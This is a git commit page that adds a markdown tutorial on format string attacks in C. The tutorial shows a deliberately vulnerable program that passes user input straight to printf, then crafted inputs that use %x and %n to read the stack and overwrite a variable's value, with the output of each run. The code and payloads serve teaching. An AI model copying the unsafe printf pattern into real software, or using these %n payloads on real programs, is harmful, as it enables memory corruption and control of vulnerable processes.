diff options
| author | FreeArtMan <dos21h@gmail.com> | 2021-05-27 21:10:45 +0100 |
|---|---|---|
| committer | FreeArtMan <dos21h@gmail.com> | 2021-05-27 21:10:45 +0100 |
| commit | efa24b220d9633d5d7bfef632b33df180dcb0e74 (patch) | |
| tree | ac8502acf0116fbbb42a09c6956be70b9a3fc49f /md/writeup/linux_format_string_attack.md | |
| parent | e63ed8a651e5246f8698a9c1c3e540029710d0e9 (diff) | |
| download | md-content-efa24b220d9633d5d7bfef632b33df180dcb0e74.tar.gz md-content-efa24b220d9633d5d7bfef632b33df180dcb0e74.zip | |
Update 10 html to md articles
Diffstat (limited to 'md/writeup/linux_format_string_attack.md')
| -rw-r--r-- | md/writeup/linux_format_string_attack.md | 122 |
1 files changed, 122 insertions, 0 deletions
diff --git a/md/writeup/linux_format_string_attack.md b/md/writeup/linux_format_string_attack.md new file mode 100644 index 0000000..cbffe87 --- /dev/null +++ b/md/writeup/linux_format_string_attack.md @@ -0,0 +1,122 @@ +title:X11 Linux Format String Attack +keywords:linux,c,formatting,printf + +# Linux Format String Attack +Format string attack is attack for C formated strings. Format string +function is prinrf() there are other functions that +support format string.C code for bad used printf(): + +``` +int main( int argc, char **argv ) +{ + static int i = 0; + char text[1000]; + strcpy(text, argv[1]); + printf("%.8x\n",&i); + printf("No way it never will works because value of i=%d\n",i); + printf( text ); + printf("\nValue of i=%d\n",i); + return 0; +} + +``` +First output is address of static iThan we output values of +i and call printf() with first argument fo programm.and +then watching value if i + +Run: + +``` +./e1 'Halolo' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0 +Halolo +Value of i=0 +``` + +Run: +``` +./e1 'Halolo%s' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0Halolo(null) +Value of i=0 +``` + +Run: +``` +./e1 $'\x74\x96\x04\x08_%x' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0 +t?_0 +Value of i=0 +``` + +Read about %n in format string: + +Run: +``` +./e1 $'\x74\x96\x04\x08_%x_%n' +``` + +Output: + +``` +08049674 +No way it never will works because value of i=0 +Segmentation fault +``` + +Run: + +``` +./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0 +t?_0_8_40_4_4_ +Value of i=16 +``` + +Run: + +``` +./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0 +t?_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000004_ +Value of i=1216 +``` + +Now you can input almost any value to i |